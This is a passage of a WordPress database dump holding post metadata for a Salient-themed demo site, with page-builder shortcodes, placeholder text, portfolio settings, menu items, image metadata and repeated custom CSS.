column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"2/3\"][split_line_heading]\r\n<h2 style=\"color: #50d18e;\">Design How it\'s meant to be.</h2>\r\n<h2 style=\"color: #50d18e;\">Salient Will Enhance Your Content</h2>\r\n<h2 style=\"color: #50d18e;\">And Allow It To Fully Shine.</h2>\r\n[/split_line_heading][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]<span style=\"color: #999999;\">She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove</span>,[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_gallery type=\"flickity_style\" onclick=\"link_no\" img_size=\"full\"][/vc_column][/vc_row]'),(245,92,'_nectar_portfolio_item_layout','enabled'),(246,92,'_nectar_portfolio_custom_grid_item','off'),(247,92,'_nectar_portfolio_custom_grid_item_content',''),(248,92,'_nectar_portfolio_custom_thumbnail',''),(249,92,'_nectar_hide_featured','on'),(250,92,'_portfolio_item_masonry_sizing','regular'),(251,92,'_portfolio_item_masonry_content_pos','middle'),(252,92,'_nectar_external_project_url',''),(253,92,'nectar-metabox-portfolio-parent-override','default'),(254,92,'_nectar_project_excerpt','Pure eye candy'),(255,92,'_nectar_project_accent_color','#a7ffed'),(256,92,'_nectar_project_title_color',''),(257,92,'_nectar_project_subtitle_color',''),(258,92,'_nectar_header_bg',''),(259,92,'_nectar_header_parallax','on'),(260,92,'_nectar_header_bg_height','400'),(261,92,'_nectar_header_bg_color','#262626'),(262,92,'_nectar_header_subtitle','Pure Eye Candy'),(263,92,'_nectar_header_font_color',''),(264,92,'_disable_transparent_header','off'),(265,92,'_nectar_video_m4v',''),(266,92,'_nectar_video_ogv',''),(267,92,'_nectar_video_height',''),(268,92,'_nectar_video_poster',''),(269,92,'_nectar_video_embed',''),(270,92,'_nectar_love','0'),(271,96,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(272,96,'_wpb_vc_js_status','true'),(273,96,'_nectar_portfolio_extra_content','[vc_row type=\"full_width_background\" bg_color=\"#353535\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n<h6><span style=\"color: #ff9ab6;\">Overview</span></h6>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#353535\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" bottom_padding=\"4%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text css=\".vc_custom_1451936195173{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #ffabc2;\">Project</span></h6>\r\n<span style=\"color: #999999;\">Jack Graham Personal Photo Shoot</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451936166985{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #ffabc2;\">Client</span></h6>\r\n<span style=\"color: #999999;\">Jack Graham</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451936179250{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #ffabc2;\">What We Did</span></h6>\r\n<span style=\"color: #999999;\">Photography, Image Editing</span>[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" constrain_max_cols=\"true\" gallery_style=\"3\" img_size=\"500x500\"][/vc_column][/vc_row]'),(274,96,'_nectar_portfolio_item_layout','enabled'),(275,96,'_nectar_portfolio_custom_grid_item','off'),(276,96,'_nectar_portfolio_custom_grid_item_content',''),(277,96,'_nectar_portfolio_custom_thumbnail',''),(278,96,'_nectar_hide_featured','on'),(279,96,'_portfolio_item_masonry_sizing','regular'),(280,96,'_portfolio_item_masonry_content_pos','middle'),(281,96,'_nectar_external_project_url',''),(282,96,'nectar-metabox-portfolio-parent-override','default'),(283,96,'_nectar_project_excerpt','Photo shoot'),(284,96,'_nectar_project_accent_color','#ff9ab6'),(285,96,'_nectar_project_title_color',''),(286,96,'_nectar_project_subtitle_color',''),(287,96,'_nectar_header_bg',''),(288,96,'_nectar_header_parallax','on'),(289,96,'_nectar_header_bg_height','400'),(290,96,'_nectar_header_bg_color','#ffabc2'),(291,96,'_nectar_header_subtitle','Throughout New York'),(292,96,'_nectar_header_font_color',''),(293,96,'_disable_transparent_header','off'),(294,96,'_nectar_video_m4v',''),(295,96,'_nectar_video_ogv',''),(296,96,'_nectar_video_height',''),(297,96,'_nectar_video_poster',''),(298,96,'_nectar_video_embed',''),(299,96,'_nectar_love','0'),(372,6187,'_wp_attached_file','2013/01/sample-img.png'),(373,6187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:402;s:4:\"file\";s:22:\"2013/01/sample-img.png\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"sample-img-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"sample-img-300x201.png\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:22:\"sample-img-600x402.png\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:22:\"sample-img-400x269.png\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:22:\"sample-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:22:\"sample-img-140x140.png\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:22:\"sample-img-600x335.png\";s:5:\"width\";i:600;s:6:\"height\";i:335;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"regular\";a:4:{s:4:\"file\";s:22:\"sample-img-500x402.png\";s:5:\"width\";i:500;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:22:\"sample-img-350x350.png\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"tall\";a:4:{s:4:\"file\";s:22:\"sample-img-500x402.png\";s:5:\"width\";i:500;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(383,6189,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(384,6189,'_menu_item_type','post_type'),(385,6189,'_menu_item_menu_item_parent','0'),(386,6189,'_menu_item_object_id','25'),(387,6189,'_menu_item_object','page'),(388,6189,'_menu_item_target',''),(389,6189,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(390,6189,'_menu_item_xfn',''),(391,6189,'_menu_item_url',''),(401,6191,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(402,6191,'_menu_item_type','post_type'),(403,6191,'_menu_item_menu_item_parent','0'),(404,6191,'_menu_item_object_id','19'),(405,6191,'_menu_item_object','page'),(406,6191,'_menu_item_target',''),(407,6191,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(408,6191,'_menu_item_xfn',''),(409,6191,'_menu_item_url',''),(410,6192,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(411,6192,'_menu_item_type','post_type'),(412,6192,'_menu_item_menu_item_parent','0'),(413,6192,'_menu_item_object_id','5'),(414,6192,'_menu_item_object','page'),(415,6192,'_menu_item_target',''),(416,6192,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(417,6192,'_menu_item_xfn',''),(418,6192,'_menu_item_url',''),(781,6144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(782,6144,'_wpb_vc_js_status','true'),(783,6144,'_nectar_gallery_slider','off'),(784,6144,'_nectar_quote',''),(785,6144,'_nectar_link',''),(786,6144,'_nectar_video_m4v',''),(787,6144,'_nectar_video_ogv',''),(788,6144,'_nectar_video_poster',''),(789,6144,'_nectar_video_embed',''),(790,6144,'_nectar_audio_mp3',''),(791,6144,'_nectar_audio_ogg',''),(792,6144,'_post_item_masonry_sizing','regular'),(793,6144,'_nectar_header_bg',''),(794,6144,'_nectar_header_parallax','on'),(795,6144,'_nectar_header_bg_height',''),(796,6144,'_nectar_header_bg_color','#232323'),(797,6144,'_nectar_header_font_color',''),(798,6144,'_disable_transparent_header','off'),(799,6144,'_nectar_love','0'),(800,6144,'_thumbnail_id','6187'),(824,5,'_edit_lock','1517274364:1'),(825,19,'_edit_lock','1516234795:1'),(826,62,'_edit_lock','1512923463:1'),(827,69,'_edit_lock','1512922589:1'),(828,67,'_edit_lock','1512922590:1'),(829,96,'_edit_lock','1512922590:1'),(830,92,'_edit_lock','1512922592:1'),(831,62,'_edit_last','1'),(832,62,'_nectar_project_css_class',''),(833,62,'_nectar_slider_bg_type','image_bg'),(834,62,'_nectar_media_upload_webm',''),(835,62,'_nectar_media_upload_mp4',''),(836,62,'_nectar_media_upload_ogv',''),(837,62,'_nectar_slider_preview_image',''),(838,62,'_nectar_header_fullscreen','off'),(839,62,'_nectar_page_header_bg_alignment','center'),(840,62,'_nectar_header_bg_overlay_color',''),(841,62,'_wp_old_slug','the-bike-project'),(842,62,'_wpb_shortcodes_custom_css','.vc_custom_1451884222864{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451884227619{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451884235241{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}'),(843,69,'_edit_last','1'),(844,69,'_nectar_project_css_class',''),(845,69,'_nectar_slider_bg_type','image_bg'),(846,69,'_nectar_media_upload_webm',''),(847,69,'_nectar_media_upload_mp4',''),(848,69,'_nectar_media_upload_ogv',''),(849,69,'_nectar_slider_preview_image',''),(850,69,'_nectar_header_fullscreen','off'),(851,69,'_nectar_page_header_bg_alignment','center'),(852,69,'_nectar_header_bg_overlay_color',''),(853,69,'_wp_old_slug','night-sky-app'),(854,69,'_wpb_shortcodes_custom_css','.vc_custom_1451929836056{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451929848432{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451931742846{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}'),(855,67,'_edit_last','1'),(856,67,'_nectar_project_css_class',''),(857,67,'_nectar_slider_bg_type','image_bg'),(858,67,'_nectar_media_upload_webm',''),(859,67,'_nectar_media_upload_mp4',''),(860,67,'_nectar_media_upload_ogv',''),(861,67,'_nectar_slider_preview_image',''),(862,67,'_nectar_header_fullscreen','off'),(863,67,'_nectar_page_header_bg_alignment','center'),(864,67,'_nectar_header_bg_overlay_color',''),(865,67,'_wp_old_slug','waveform'),(866,67,'_wpb_shortcodes_custom_css','.vc_custom_1451934363103{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451934370844{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451934352663{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}'),(867,96,'_edit_last','1'),(868,96,'_nectar_project_css_class',''),(869,96,'_nectar_slider_bg_type','image_bg'),(870,96,'_nectar_media_upload_webm',''),(871,96,'_nectar_media_upload_mp4',''),(872,96,'_nectar_media_upload_ogv',''),(873,96,'_nectar_slider_preview_image',''),(874,96,'_nectar_header_fullscreen','off'),(875,96,'_nectar_page_header_bg_alignment','center'),(876,96,'_nectar_header_bg_overlay_color',''),(877,96,'_wp_old_slug','jack-graham-photo-shoot'),(878,96,'_wpb_shortcodes_custom_css','.vc_custom_1451936195173{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451936166985{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451936179250{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}'),(879,92,'_edit_last','1'),(880,92,'_nectar_project_css_class',''),(881,92,'_nectar_slider_bg_type','image_bg'),(882,92,'_nectar_media_upload_webm',''),(883,92,'_nectar_media_upload_mp4',''),(884,92,'_nectar_media_upload_ogv',''),(885,92,'_nectar_slider_preview_image',''),(886,92,'_nectar_header_fullscreen','off'),(887,92,'_nectar_page_header_bg_alignment','center'),(888,92,'_nectar_header_bg_overlay_color',''),(889,92,'_wp_old_slug','blog-ui'),(890,92,'_wpb_shortcodes_custom_css','.vc_custom_1451938109211{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451938068907{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}.vc_custom_1451938112790{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}'),(891,5,'_edit_last','1'),(892,5,'_nectar_full_screen_rows','off'),(893,5,'_nectar_full_screen_rows_animation','none'),(894,5,'_nectar_full_screen_rows_animation_speed','medium'),(895,5,'_nectar_full_screen_rows_overall_bg_color',''),(896,5,'_nectar_full_screen_rows_anchors','off'),(897,5,'_nectar_full_screen_rows_mobile_disable','off'),(898,5,'_nectar_full_screen_rows_row_bg_animation','none'),(899,5,'_nectar_full_screen_rows_dot_navigation','tooltip'),(900,5,'_nectar_full_screen_rows_content_overflow','scrollbar'),(901,5,'_nectar_full_screen_rows_footer','none'),(902,5,'_nectar_header_bg_overlay_color',''),(903,19,'_edit_last','1'),(904,19,'_nectar_full_screen_rows','off'),(905,19,'_nectar_full_screen_rows_animation','none'),(906,19,'_nectar_full_screen_rows_animation_speed','medium'),(907,19,'_nectar_full_screen_rows_overall_bg_color',''),(908,19,'_nectar_full_screen_rows_anchors','off'),(909,19,'_nectar_full_screen_rows_mobile_disable','off'),(910,19,'_nectar_full_screen_rows_row_bg_animation','none'),(911,19,'_nectar_full_screen_rows_dot_navigation','tooltip'),(912,19,'_nectar_full_screen_rows_content_overflow','scrollbar'),(913,19,'_nectar_full_screen_rows_footer','none'),(914,19,'_nectar_header_bg_overlay_color',''),(915,6206,'_wp_attached_file','2017/12/logo-site.png'),(916,6206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:215;s:6:\"height\";i:76;s:4:\"file\";s:21:\"2017/12/logo-site.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"logo-site-150x76.png\";s:5:\"width\";i:150;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:20:\"logo-site-100x76.png\";s:5:\"width\";i:100;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:20:\"logo-site-140x76.png\";s:5:\"width\";i:140;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(917,6144,'nectar_blog_post_view_count','8'),(918,6144,'_edit_lock','1513222953:1'),(1001,6144,'_edit_last','1'),(1003,6144,'_nectar_quote_author',''),(1004,6144,'_nectar_page_header_bg_alignment','top'),(1006,6229,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1007,6229,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1008,6229,'_wpb_vc_js_status','true'),(1009,6229,'_nectar_gallery_slider','off'),(1010,6229,'_nectar_quote',''),(1011,6229,'_nectar_link',''),(1012,6229,'_nectar_video_m4v',''),(1013,6229,'_nectar_video_ogv',''),(1014,6229,'_nectar_video_poster',''),(1015,6229,'_nectar_video_embed',''),(1016,6229,'_nectar_audio_mp3',''),(1017,6229,'_nectar_audio_ogg',''),(1018,6229,'_post_item_masonry_sizing','regular'),(1019,6229,'_nectar_header_bg',''),(1020,6229,'_nectar_header_parallax','on'),(1021,6229,'_nectar_header_bg_height',''),(1022,6229,'_nectar_header_bg_color','#232323'),(1023,6229,'_nectar_header_font_color',''),(1024,6229,'_disable_transparent_header','off'),(1025,6229,'_nectar_love','0'),(1026,6229,'_thumbnail_id','6187'),(1027,6229,'nectar_blog_post_view_count','5'),(1028,6229,'_nectar_quote_author',''),(1029,6229,'_nectar_page_header_bg_alignment','top'),(1030,6229,'_dp_original','6144'),(1031,6229,'_edit_lock','1513223968:1'),(1032,6229,'_edit_last','1'),(1034,6229,'_wp_old_slug','the-reason-we-decided-to-change-locations'),(1035,32,'_edit_lock','1513223071:1'),(1036,32,'_edit_last','1'),(1037,32,'_nectar_full_screen_rows','off'),(1038,32,'_nectar_full_screen_rows_animation','none'),(1039,32,'_nectar_full_screen_rows_animation_speed','medium'),(1040,32,'_nectar_full_screen_rows_overall_bg_color',''),(1041,32,'_nectar_full_screen_rows_anchors','off'),(1042,32,'_nectar_full_screen_rows_mobile_disable','off'),(1043,32,'_nectar_full_screen_rows_row_bg_animation','none'),(1044,32,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1045,32,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1046,32,'_nectar_full_screen_rows_footer','none'),(1047,32,'_nectar_header_bg_overlay_color',''),(1048,6232,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1049,6232,'_menu_item_type','post_type'),(1050,6232,'_menu_item_menu_item_parent','0'),(1051,6232,'_menu_item_object_id','32'),(1052,6232,'_menu_item_object','page'),(1053,6232,'_menu_item_target',''),(1054,6232,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1055,6232,'_menu_item_xfn',''),(1056,6232,'_menu_item_url',''),(1058,6235,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1059,6235,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1060,6235,'_wp_page_template','default'),(1061,6235,'_wpb_vc_js_status','true'),(1062,6235,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1063,6235,'nectar-metabox-portfolio-display-sortable','off'),(1064,6235,'_nectar_slider_bg_type','image_bg'),(1065,6235,'_nectar_canvas_shapes',''),(1066,6235,'_nectar_media_upload_webm',''),(1067,6235,'_nectar_media_upload_mp4',''),(1068,6235,'_nectar_media_upload_ogv',''),(1069,6235,'_nectar_slider_preview_image',''),(1070,6235,'_nectar_header_bg',''),(1071,6235,'_nectar_header_parallax','off'),(1072,6235,'_nectar_header_box_roll','off'),(1073,6235,'_nectar_header_bg_height',''),(1074,6235,'_nectar_header_fullscreen','off'),(1075,6235,'_nectar_header_title',''),(1076,6235,'_nectar_header_subtitle',''),(1077,6235,'_nectar_page_header_text-effect','none'),(1078,6235,'_nectar_particle_rotation_timing',''),(1079,6235,'_nectar_particle_disable_explosion','off'),(1080,6235,'_nectar_page_header_alignment','left'),(1081,6235,'_nectar_page_header_alignment_v','middle'),(1082,6235,'_nectar_page_header_bg_alignment','center'),(1083,6235,'_nectar_header_bg_color',''),(1084,6235,'_nectar_header_font_color',''),(1085,6235,'_disable_transparent_header','off'),(1086,6235,'_force_transparent_header','off'),(1087,6235,'_nectar_full_screen_rows','off'),(1088,6235,'_nectar_full_screen_rows_animation','none'),(1089,6235,'_nectar_full_screen_rows_animation_speed','medium'),(1090,6235,'_nectar_full_screen_rows_overall_bg_color',''),(1091,6235,'_nectar_full_screen_rows_anchors','off'),(1092,6235,'_nectar_full_screen_rows_mobile_disable','off'),(1093,6235,'_nectar_full_screen_rows_row_bg_animation','none'),(1094,6235,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1095,6235,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1096,6235,'_nectar_full_screen_rows_footer','none'),(1097,6235,'_nectar_header_bg_overlay_color',''),(1098,6235,'_dp_original','32'),(1099,6236,'_vc_post_settings','a:1:{s:10:\"vc_